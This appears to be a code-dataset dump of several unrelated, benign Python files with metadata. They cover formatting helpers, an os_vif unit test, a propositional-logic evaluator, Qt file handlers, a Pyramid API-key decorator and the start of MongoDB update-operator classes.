count = byte_count unit = "bytes" for (new_unit, new_scale) in prefixes.items(): new_count = byte_count / new_scale if new_count < 1.0: break else: count = new_count unit = new_unit if isinstance(count, int): # count is an integer -> use no decimal places return "{} {}".format(count, unit) else: # count is a float -> use two decimal places return "{:.2f} {}".format(count, unit) #### #%%% output-related #### def now_str(mode="compact", date=True, time=True, microtime=True): """ Return the current date and/or time as string. """ # check arguments if not (date or time or microtime): raise ValueError("At least one of 'date', 'time', 'microtime' must be `True`") # select format string parts based on mode if mode == "compact": date_fmt = "%Y%m%d" time_sep = "_" time_fmt = "%H%M%S" micro_sep = "_" micro_fmt = "%f" elif mode == "readable": date_fmt = "%Y-%m-%d" time_sep = "__" time_fmt = "%H-%M-%S" micro_sep = "__" micro_fmt = "%f" elif mode == "print": date_fmt = "%Y-%m-%d" time_sep = " " time_fmt = "%H:%M:%S" micro_sep = "." micro_fmt = "%f" else: raise ValueError("Invalid mode '{}".format(mode)) # build final format string fmt = "" if date: fmt += date_fmt if time: if fmt != "": fmt += time_sep fmt += time_fmt if microtime: if fmt != "": fmt += micro_sep fmt += micro_fmt # return formatted date and/or time return datetime.datetime.now().strftime(fmt) def ftable(rows, first_row_is_header=False): """ Format the data specified in `rows` as table string. """ col_sep = " " sep_symbol = "-" # count the max length for each column col_count = max(len(row) for row in rows) col_lengths = [0] * col_count for row in rows: for n_col in range(col_count): col_lengths[n_col] = max(col_lengths[n_col], len(str(row[n_col]))) # the line at the top and bottom sep_line = col_sep.join(sep_symbol * col_length for col_length in col_lengths) # transform rows into lines lines = [] lines.append(sep_line) for (n_row, row) in enumerate(rows): col_strs = [] for (col_length, col) in zip(col_lengths, row): col_str = "{{: <{}}}".format(col_length).format(str(col)) col_strs.append(col_str) lines.append(col_sep.join(col_strs)) if first_row_is_header and (n_row == 0): lines.append(sep_line) lines.append(sep_line) # return table as single string return "\n".join(lines) def ptable(rows, ftable_kwargs=None, print_kwargs=None): """ Print the data specified in `rows` as table. """ if ftable_kwargs is None: ftable_kwargs = {} if print_kwargs is None: print_kwargs = {} print(ftable(rows=rows, **ftable_kwargs), **print_kwargs)
en
0.701296
#### #%%% OpenCV-related #### #### #%%% checks #### # check tuple/list # check length # check value ranges #### #%%% number-related #### Rounds a number to the first `digit_count` digits after the appearance of the first non-zero digit. This function supports Python `float`s and `int`s as well as NumPy scalars of any type (e.g., `np.float32`, `np.uint8`, etc.). #### #%%% file-related #### Create the given directory if it does not already exist. Creates and returns temporary directory. The property `.name` holds the path. It can be deleted using the `.cleanup()` method. Formats a given `byte_count` into a human-readable string. # count is an integer -> use no decimal places # count is a float -> use two decimal places #### #%%% output-related #### Return the current date and/or time as string. # check arguments # select format string parts based on mode # build final format string # return formatted date and/or time Format the data specified in `rows` as table string. # count the max length for each column # the line at the top and bottom # transform rows into lines # return table as single string Print the data specified in `rows` as table.
2.972224
3
os_vif/tests/test_host_info.py
mail2nsrajesh/os-vif
0
6629032
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from os_vif import exception from os_vif import objects from os_vif.tests import base class TestHostInfo(base.TestCase): def setUp(self): super(TestHostInfo, self).setUp() self.host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) def test_serialization(self): json = self.host_info.obj_to_primitive() host_info = objects.host_info.HostInfo.obj_from_primitive(json) self.assertEqual(self.host_info, host_info) def test_plugin_existance(self): self.assertTrue(self.host_info.has_plugin("ovs")) self.assertFalse(self.host_info.has_plugin("fishfood")) def test_plugin_fetch(self): plugin = self.host_info.get_plugin("ovs") self.assertEqual("ovs", plugin.plugin_name) self.assertRaises(exception.NoMatchingPlugin, self.host_info.get_plugin, "fishfood") def test_vif_existance(self): plugin = self.host_info.get_plugin("ovs") self.assertTrue(plugin.has_vif("VIFOpenVSwitch")) self.assertFalse(plugin.has_vif("VIFFishFood")) def test_vif_fetch(self): plugin = self.host_info.get_plugin("ovs") vif = plugin.get_vif("VIFOpenVSwitch") self.assertEqual("VIFOpenVSwitch", vif.vif_object_name) self.assertRaises(exception.NoMatchingVIFClass, plugin.get_vif, "VIFFishFood") def test_common_version_no_obj(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFFishFood", min_version="1.0", max_version="1.8") self.assertRaises(exception.NoMatchingVIFClass, info.get_common_version) def test_common_version_no_version(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1729.0", max_version="8753.0") self.assertRaises(exception.NoSupportedVIFVersion, info.get_common_version) def test_common_version_ok(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="10.0") ver = info.get_common_version() self.assertEqual(objects.vif.VIFOpenVSwitch.VERSION, ver) def test_filtering(self): host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) host_info.filter_vif_types(["VIFBridge", "VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 2) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") plugin = host_info.plugin_info[1] self.assertEqual(len(plugin.vif_info), 2) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") self.assertEqual(plugin.vif_info[1].vif_object_name, "VIFOpenVSwitch") host_info.filter_vif_types(["VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 1) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFOpenVSwitch")
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from os_vif import exception from os_vif import objects from os_vif.tests import base class TestHostInfo(base.TestCase): def setUp(self): super(TestHostInfo, self).setUp() self.host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) def test_serialization(self): json = self.host_info.obj_to_primitive() host_info = objects.host_info.HostInfo.obj_from_primitive(json) self.assertEqual(self.host_info, host_info) def test_plugin_existance(self): self.assertTrue(self.host_info.has_plugin("ovs")) self.assertFalse(self.host_info.has_plugin("fishfood")) def test_plugin_fetch(self): plugin = self.host_info.get_plugin("ovs") self.assertEqual("ovs", plugin.plugin_name) self.assertRaises(exception.NoMatchingPlugin, self.host_info.get_plugin, "fishfood") def test_vif_existance(self): plugin = self.host_info.get_plugin("ovs") self.assertTrue(plugin.has_vif("VIFOpenVSwitch")) self.assertFalse(plugin.has_vif("VIFFishFood")) def test_vif_fetch(self): plugin = self.host_info.get_plugin("ovs") vif = plugin.get_vif("VIFOpenVSwitch") self.assertEqual("VIFOpenVSwitch", vif.vif_object_name) self.assertRaises(exception.NoMatchingVIFClass, plugin.get_vif, "VIFFishFood") def test_common_version_no_obj(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFFishFood", min_version="1.0", max_version="1.8") self.assertRaises(exception.NoMatchingVIFClass, info.get_common_version) def test_common_version_no_version(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1729.0", max_version="8753.0") self.assertRaises(exception.NoSupportedVIFVersion, info.get_common_version) def test_common_version_ok(self): info = objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="10.0") ver = info.get_common_version() self.assertEqual(objects.vif.VIFOpenVSwitch.VERSION, ver) def test_filtering(self): host_info = objects.host_info.HostInfo( plugin_info=[ objects.host_info.HostPluginInfo( plugin_name="linux_brige", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="1.0", max_version="3.0" ), ]), objects.host_info.HostPluginInfo( plugin_name="ovs", vif_info=[ objects.host_info.HostVIFInfo( vif_object_name="VIFBridge", min_version="2.0", max_version="7.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFOpenVSwitch", min_version="1.0", max_version="2.0" ), objects.host_info.HostVIFInfo( vif_object_name="VIFVHostUser", min_version="1.0", max_version="2.0" ), ]) ]) host_info.filter_vif_types(["VIFBridge", "VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 2) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") plugin = host_info.plugin_info[1] self.assertEqual(len(plugin.vif_info), 2) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFBridge") self.assertEqual(plugin.vif_info[1].vif_object_name, "VIFOpenVSwitch") host_info.filter_vif_types(["VIFOpenVSwitch"]) self.assertEqual(len(host_info.plugin_info), 1) plugin = host_info.plugin_info[0] self.assertEqual(len(plugin.vif_info), 1) self.assertEqual(plugin.vif_info[0].vif_object_name, "VIFOpenVSwitch")
en
0.859654
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License.
2.021569
2
pca_main/pcabuilder.py
p2424630/PCA
0
6629033
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 from itertools import product from pca_main import pcaprop, pcaparser, pcalaws class InitProp(pcalaws.Laws): __slots__ = '_parsed' def __init__(self, proposition: str) -> None: self._parsed = pcaparser.PARSER.parse(proposition) def __eq__(self, other) -> bool: """ Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool """ return isinstance(other, self.__class__) and self._parsed == other._parsed def __str__(self): return str(self._parsed) def __repr__(self): return repr(self._parsed) @property def proposition(self): return self._parsed def unique_vars(self): """ :return: Sorted list of all unique variables. """ def _get_vars(op): """ Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables """ if isinstance(op, pcaprop.Variable): return [op] if isinstance(op, pcaprop.UnaryOp): return _get_vars(op.prop) if isinstance(op, pcaprop.BinaryOp): return _get_vars(op.prop_l) + _get_vars(op.prop_r) return [] return sorted(set(_get_vars(self._parsed))) def interpretations(self): """ Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable """ def _get_interp(op, interp): """ Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. """ if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.Variable): return interp[op] if isinstance(op, pcaprop.UnaryOp): return op.__class__(_get_interp(op.prop, interp)) if isinstance(op, pcaprop.BinaryOp): prop_l = _get_interp(op.prop_l, interp) prop_r = _get_interp(op.prop_r, interp) return op.__class__(prop_l, prop_r) prop_vars = self.unique_vars() len_prop_vars = len(prop_vars) if len_prop_vars < 1: # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. return # List of tuples for all possible interpretations for given number of variables combinations = product([pcaprop.FalseProp(), pcaprop.TrueProp()], repeat=len_prop_vars) for combination in combinations: # Create a dictionary mapping the variables to the current interpretation values. interp = dict(zip(prop_vars, combination)) # Replace the variables in the proposition with the current interpretation mapping. interp_prop = _get_interp(self._parsed, interp) interp_values = list(interp.values()) # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. interp_values.append(self.eval_prop(interp_prop)) yield interp_values def satisfiable(self): """ Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if i[-1]: return pcaprop.TrueProp() return pcaprop.FalseProp() def tautology(self): """ Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if not i[-1]: return pcaprop.FalseProp() return pcaprop.TrueProp() def contradiction(self): """ Check if self is a contradiction by returning the opposite of satisfiable. :return: bool (Class) """ return pcaprop.FalseProp() if self.satisfiable() else pcaprop.TrueProp() @staticmethod def eval_prop(op): """ Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class) """ def _eval_prop(op): if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.NegationOp): return op.__class__(_eval_prop(op.prop)).eval() if isinstance(op, (pcaprop.DisjunctionOp, pcaprop.ConjunctionOp, pcaprop.ImplicationOp, pcaprop.EquivalenceOp)): prop_l = _eval_prop(op.prop_l) prop_r = _eval_prop(op.prop_r) return op.__class__(prop_l, prop_r).eval() return _eval_prop(op)
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 from itertools import product from pca_main import pcaprop, pcaparser, pcalaws class InitProp(pcalaws.Laws): __slots__ = '_parsed' def __init__(self, proposition: str) -> None: self._parsed = pcaparser.PARSER.parse(proposition) def __eq__(self, other) -> bool: """ Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool """ return isinstance(other, self.__class__) and self._parsed == other._parsed def __str__(self): return str(self._parsed) def __repr__(self): return repr(self._parsed) @property def proposition(self): return self._parsed def unique_vars(self): """ :return: Sorted list of all unique variables. """ def _get_vars(op): """ Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables """ if isinstance(op, pcaprop.Variable): return [op] if isinstance(op, pcaprop.UnaryOp): return _get_vars(op.prop) if isinstance(op, pcaprop.BinaryOp): return _get_vars(op.prop_l) + _get_vars(op.prop_r) return [] return sorted(set(_get_vars(self._parsed))) def interpretations(self): """ Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable """ def _get_interp(op, interp): """ Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. """ if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.Variable): return interp[op] if isinstance(op, pcaprop.UnaryOp): return op.__class__(_get_interp(op.prop, interp)) if isinstance(op, pcaprop.BinaryOp): prop_l = _get_interp(op.prop_l, interp) prop_r = _get_interp(op.prop_r, interp) return op.__class__(prop_l, prop_r) prop_vars = self.unique_vars() len_prop_vars = len(prop_vars) if len_prop_vars < 1: # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. return # List of tuples for all possible interpretations for given number of variables combinations = product([pcaprop.FalseProp(), pcaprop.TrueProp()], repeat=len_prop_vars) for combination in combinations: # Create a dictionary mapping the variables to the current interpretation values. interp = dict(zip(prop_vars, combination)) # Replace the variables in the proposition with the current interpretation mapping. interp_prop = _get_interp(self._parsed, interp) interp_values = list(interp.values()) # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. interp_values.append(self.eval_prop(interp_prop)) yield interp_values def satisfiable(self): """ Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if i[-1]: return pcaprop.TrueProp() return pcaprop.FalseProp() def tautology(self): """ Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) """ if len(self.unique_vars()) < 1: return self.eval_prop(self._parsed) for i in self.interpretations(): if not i[-1]: return pcaprop.FalseProp() return pcaprop.TrueProp() def contradiction(self): """ Check if self is a contradiction by returning the opposite of satisfiable. :return: bool (Class) """ return pcaprop.FalseProp() if self.satisfiable() else pcaprop.TrueProp() @staticmethod def eval_prop(op): """ Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class) """ def _eval_prop(op): if isinstance(op, (pcaprop.TrueProp, pcaprop.FalseProp)): return op if isinstance(op, pcaprop.NegationOp): return op.__class__(_eval_prop(op.prop)).eval() if isinstance(op, (pcaprop.DisjunctionOp, pcaprop.ConjunctionOp, pcaprop.ImplicationOp, pcaprop.EquivalenceOp)): prop_l = _eval_prop(op.prop_l) prop_r = _eval_prop(op.prop_r) return op.__class__(prop_l, prop_r).eval() return _eval_prop(op)
en
0.732378
# @Author: GKarseras # @Date: 15 Nov 2020 11:13 Structural equivalence 'A or B' != 'B or A' 'A or B' == '(A or B)' :param other: :return: bool :return: Sorted list of all unique variables. Recursively traverse proposition and return a list of all variables. :param op: Proposition :return: list of variables Create all possible interpretations for all unique variables. For each interpretation replace the variables in the proposition and evaluate, the result is then appended to the current interpretation's list and yielded. :return: iterable Recursively traverse proposition and replace all instances of variables with the interpretation mapping. :param op: Proposition :param interp: Dictionary mapping variables to TrueProp or FalseProp. :return: Proposition with FalseProp/TrueProp instead of Variables. # Return empty interpretation as this means the proposition is composed without any variables, # which means it can only take one, the current, interpretation. # List of tuples for all possible interpretations for given number of variables # Create a dictionary mapping the variables to the current interpretation values. # Replace the variables in the proposition with the current interpretation mapping. # For the current interpretation evaluate the proposition and append the result in the original # interpretation list. Check if self is satisfiable, this is calculated based on all interpretations. :return: bool (Class) Check if self is a tautology, this is calculated based on all interpretations. :return: bool (Class) Check if self is a contradiction by returning the opposite of satisfiable. :return: bool (Class) Recursively traverse proposition and perform evaluation. :param op: Proposition :return: bool (Class)
2.452456
2
src/python/director/actionhandlers.py
ori-drs/director
18
6629034
import os from PythonQt import QtCore, QtGui import director.applogic as app import director.objectmodel as om import director.ioutils as io import director.visualization as vis from director import roboturdf from director import otdfmodel _lastDir = None def getDefaultDirectory(): return _lastDir or os.getcwd() def storeDefaultDirectory(filename): global _lastDir if os.path.isfile(filename): filename = os.path.dirname(filename) if os.path.isdir(filename): _lastDir = filename def onFileOpenDialog(): mainWindow = app.getMainWindow() fileFilters = "Data Files (*.obj *.pcd *.ply *.stl *.vtk *.vtp *.wrl *.urdf *.otdf)" filename = QtGui.QFileDialog.getOpenFileName( mainWindow, "Open...", getDefaultDirectory(), fileFilters ) if not filename: return storeDefaultDirectory(filename) onOpenFile(filename) def onOpenFile(filename): if filename.lower().endswith("urdf"): onOpenUrdf(filename) elif filename.lower().endswith("otdf"): onOpenOtdf(filename) else: onOpenGeometry(filename) def onOpenGeometry(filename): if filename.lower().endswith("wrl"): onOpenVrml(filename) return polyData = io.readPolyData(filename) if not polyData or not polyData.GetNumberOfPoints(): app.showErrorMessage( "Failed to read any data from file: %s" % filename, title="Reader error" ) return vis.showPolyData(polyData, os.path.basename(filename), parent="files") def onOpenVrml(filename): meshes, color = io.readVrml(filename) folder = om.getOrCreateContainer( os.path.basename(filename), parentObj=om.getOrCreateContainer("files") ) for i, pair in enumerate(zip(meshes, color)): mesh, color = pair vis.showPolyData(mesh, "mesh %d" % i, color=color, parent=folder) def onOpenUrdf(filename): model = roboturdf.openUrdf(filename, app.getCurrentRenderView()) if not model: app.showErrorMessage( "Failed to read urdf file: %s" % filename, title="Read urdf error" ) def onOpenOtdf(filename): model = otdfmodel.openOtdf(filename, app.getCurrentRenderView()) def onFileExportUrdf(): obj = om.getActiveObject() if not obj or not isinstance(obj, otdfmodel.OtdfModelItem): app.showErrorMessage( "Please select an OTDF object", title="OTDF object not selected" ) return mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "URDF (*.urdf)", "URDF (*.urdf)", ) if not os.path.splitext(filename)[1]: filename += ".urdf" storeDefaultDirectory(filename) urdfString = obj.parser.getUrdfFromOtdf() urdfFile = open(filename, "w") urdfFile.write(urdfString) urdfFile.close() def onFileSaveData(): obj = om.getActiveObject() if not obj: app.showErrorMessage("Please select an object", title="No object selected") return if isinstance(obj, otdfmodel.OtdfModelItem): mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "OTDF (*.otdf)", "OTDF (*.otdf)", ) if not os.path.splitext(filename)[1]: filename += ".otdf" storeDefaultDirectory(filename) otdfString = obj.parser.getUpdatedOtdf() otdfFile = open(filename, "w") otdfFile.write(otdfString) otdfFile.close() elif hasattr(obj, "polyData"): mainWindow = app.getMainWindow() fileFilters = "PLY (*.ply);;STL (*.stl);;VTP (*.vtp);;VTK (*.vtk)" defaultFilter = "VTP (*.vtp)" filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), fileFilters, defaultFilter, ) if not filename: return if not os.path.splitext(filename)[1]: filename += ".vtp" polyData = io.writePolyData(obj.polyData, filename) else: app.showErrorMessage( "Please select an object that contains geometry data or an OTDF object", title="Invalid object selected", ) return storeDefaultDirectory(filename) def onOpenOnlineHelp(): QtGui.QDesktopServices.openUrl( QtCore.QUrl("https://openhumanoids.github.io/director/") ) def init(): mainWindow = app.getMainWindow() mainWindow.connect("fileOpen()", onFileOpenDialog) mainWindow.connect("fileSaveData()", onFileSaveData) mainWindow.connect("fileExportUrdf()", onFileExportUrdf) mainWindow.connect("openOnlineHelp()", onOpenOnlineHelp)
import os from PythonQt import QtCore, QtGui import director.applogic as app import director.objectmodel as om import director.ioutils as io import director.visualization as vis from director import roboturdf from director import otdfmodel _lastDir = None def getDefaultDirectory(): return _lastDir or os.getcwd() def storeDefaultDirectory(filename): global _lastDir if os.path.isfile(filename): filename = os.path.dirname(filename) if os.path.isdir(filename): _lastDir = filename def onFileOpenDialog(): mainWindow = app.getMainWindow() fileFilters = "Data Files (*.obj *.pcd *.ply *.stl *.vtk *.vtp *.wrl *.urdf *.otdf)" filename = QtGui.QFileDialog.getOpenFileName( mainWindow, "Open...", getDefaultDirectory(), fileFilters ) if not filename: return storeDefaultDirectory(filename) onOpenFile(filename) def onOpenFile(filename): if filename.lower().endswith("urdf"): onOpenUrdf(filename) elif filename.lower().endswith("otdf"): onOpenOtdf(filename) else: onOpenGeometry(filename) def onOpenGeometry(filename): if filename.lower().endswith("wrl"): onOpenVrml(filename) return polyData = io.readPolyData(filename) if not polyData or not polyData.GetNumberOfPoints(): app.showErrorMessage( "Failed to read any data from file: %s" % filename, title="Reader error" ) return vis.showPolyData(polyData, os.path.basename(filename), parent="files") def onOpenVrml(filename): meshes, color = io.readVrml(filename) folder = om.getOrCreateContainer( os.path.basename(filename), parentObj=om.getOrCreateContainer("files") ) for i, pair in enumerate(zip(meshes, color)): mesh, color = pair vis.showPolyData(mesh, "mesh %d" % i, color=color, parent=folder) def onOpenUrdf(filename): model = roboturdf.openUrdf(filename, app.getCurrentRenderView()) if not model: app.showErrorMessage( "Failed to read urdf file: %s" % filename, title="Read urdf error" ) def onOpenOtdf(filename): model = otdfmodel.openOtdf(filename, app.getCurrentRenderView()) def onFileExportUrdf(): obj = om.getActiveObject() if not obj or not isinstance(obj, otdfmodel.OtdfModelItem): app.showErrorMessage( "Please select an OTDF object", title="OTDF object not selected" ) return mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "URDF (*.urdf)", "URDF (*.urdf)", ) if not os.path.splitext(filename)[1]: filename += ".urdf" storeDefaultDirectory(filename) urdfString = obj.parser.getUrdfFromOtdf() urdfFile = open(filename, "w") urdfFile.write(urdfString) urdfFile.close() def onFileSaveData(): obj = om.getActiveObject() if not obj: app.showErrorMessage("Please select an object", title="No object selected") return if isinstance(obj, otdfmodel.OtdfModelItem): mainWindow = app.getMainWindow() filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), "OTDF (*.otdf)", "OTDF (*.otdf)", ) if not os.path.splitext(filename)[1]: filename += ".otdf" storeDefaultDirectory(filename) otdfString = obj.parser.getUpdatedOtdf() otdfFile = open(filename, "w") otdfFile.write(otdfString) otdfFile.close() elif hasattr(obj, "polyData"): mainWindow = app.getMainWindow() fileFilters = "PLY (*.ply);;STL (*.stl);;VTP (*.vtp);;VTK (*.vtk)" defaultFilter = "VTP (*.vtp)" filename = QtGui.QFileDialog.getSaveFileName( mainWindow, "Save Data...", getDefaultDirectory(), fileFilters, defaultFilter, ) if not filename: return if not os.path.splitext(filename)[1]: filename += ".vtp" polyData = io.writePolyData(obj.polyData, filename) else: app.showErrorMessage( "Please select an object that contains geometry data or an OTDF object", title="Invalid object selected", ) return storeDefaultDirectory(filename) def onOpenOnlineHelp(): QtGui.QDesktopServices.openUrl( QtCore.QUrl("https://openhumanoids.github.io/director/") ) def init(): mainWindow = app.getMainWindow() mainWindow.connect("fileOpen()", onFileOpenDialog) mainWindow.connect("fileSaveData()", onFileSaveData) mainWindow.connect("fileExportUrdf()", onFileExportUrdf) mainWindow.connect("openOnlineHelp()", onOpenOnlineHelp)
none
1
2.253147
2
src/logging/02_final_logging_data_auto_service/restful_auto_service/infrastructure/auth.py
turing4ever/restful-services-in-pyramid
58
6629035
<reponame>turing4ever/restful-services-in-pyramid<gh_stars>10-100 from pyramid.response import Response from restful_auto_service.data.repository import Repository def parse_api_key(request): auth_header = request.headers.get('Authorization') if not auth_header: return None, "You must specify an Authorization header." parts = auth_header.split(':') if len(parts) != 2 or parts[0].strip() != 'api-key': return None, "Invalid auth header" api_key = parts[1].strip() user = Repository.find_user_by_api_key(api_key) if not user: return None, "Invalid API Key, no user with this account." return user, None def require_api_auth(func): def wrapped(request): user, error = parse_api_key(request) if error: return Response(status=403, body=error) request.api_user = user return func(request) return wrapped
from pyramid.response import Response from restful_auto_service.data.repository import Repository def parse_api_key(request): auth_header = request.headers.get('Authorization') if not auth_header: return None, "You must specify an Authorization header." parts = auth_header.split(':') if len(parts) != 2 or parts[0].strip() != 'api-key': return None, "Invalid auth header" api_key = parts[1].strip() user = Repository.find_user_by_api_key(api_key) if not user: return None, "Invalid API Key, no user with this account." return user, None def require_api_auth(func): def wrapped(request): user, error = parse_api_key(request) if error: return Response(status=403, body=error) request.api_user = user return func(request) return wrapped
none
1
2.814682
3
motorturbine/updateset.py
BFriedrichs/motorturbine
1
6629036
<filename>motorturbine/updateset.py def to_operator(current, new_value): is_operator = isinstance(new_value, UpdateOperator) is_set = isinstance(new_value, Set) if is_operator: if not is_set and current is None: raise Exception('Cant use operator on None') else: new_value = Set(new_value) return new_value class UpdateOperator(object): """UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. """ def __init__(self, update): super().__init__() self.update = update def set_original_value(self, value): self.original_value = value class Set(UpdateOperator): """Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} """ def __call__(self): return '$set', self.update def apply(self): return self.update class Unset(UpdateOperator): """Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} """ def __call__(self): return '$unset', self.update def apply(self): return self.update class Inc(UpdateOperator): """Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} """ def __call__(self): return '$inc', self.update def apply(self): return self.original_value + self.update class Dec(UpdateOperator): """Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} """ def __call__(self): return '$inc', -self.update def apply(self): return self.original_value - self.update class Max(UpdateOperator): """Update the field to the maximum of database and current value. Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} """ def __call__(self): return '$max', self.update def apply(self): return max(self.original_value, self.update) class Min(UpdateOperator): """Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} """ def __call__(self): return '$min', self.update def apply(self): return min(self.original_value, self.update) class Mul(UpdateOperator): """Is used to multipy a numeric value by a given amount. Example 